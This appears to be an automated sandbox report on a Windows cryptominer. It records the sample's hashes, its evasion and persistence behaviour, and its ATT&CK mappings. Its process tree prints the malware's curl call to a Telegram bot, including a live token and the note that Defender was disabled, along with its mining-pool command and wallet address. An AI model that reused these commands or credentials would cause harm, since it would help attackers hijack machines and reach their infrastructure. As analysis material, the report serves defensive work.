Analysis

  • max time kernel
    8s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    19-01-2022 15:22

General

  • Target

    b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb.exe

  • Size

    1.2MB

  • MD5

    600c20e18834769dc0ae528c69108a5d

  • SHA1

    743b942a951d381c0e3efc1fac3e2f09740769c2

  • SHA256

    b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb

  • SHA512

    36079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb.exe
    "C:\Users\Admin\AppData\Local\Temp\b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb.exe"
    1⤵
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3292
    • C:\Windows\SYSTEM32\curl.exe
      curl "https://api.telegram.org/bot1765686682:AAFKW2CipVCRG2oYuHNFJMKO8RSC06ZylW8/sendMessage?chat_id=-679243704&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: None%0A(Windows Defender has been turned off)"
      2⤵
        PID:1620
      • C:\Windows\bfsvc.exe
        C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm
        2⤵
          PID:3544
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe "EQAts4pWtXhujvOGkuGJklDeNF5DubyRR7prqLdz--sbJIQm" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
          2⤵
            PID:3536

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Defense Evasion

        Modify Registry

        2
        T1112

        Disabling Security Tools

        1
        T1089

        Virtualization/Sandbox Evasion

        1
        T1497

        Discovery

        Query Registry

        2
        T1012

        Virtualization/Sandbox Evasion

        1
        T1497

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/3292-130-0x00007FF723B30000-0x00007FF723F6B000-memory.dmp
          Filesize

          4.2MB

        • memory/3292-131-0x00007FF723B30000-0x00007FF723F6B000-memory.dmp
          Filesize

          4.2MB

        • memory/3292-132-0x00007FF723B30000-0x00007FF723F6B000-memory.dmp
          Filesize

          4.2MB

        • memory/3536-134-0x0000000140000000-0x000000014002A000-memory.dmp
          Filesize

          168KB

        • memory/3544-133-0x0000000140000000-0x000000014274C000-memory.dmp
          Filesize

          39.3MB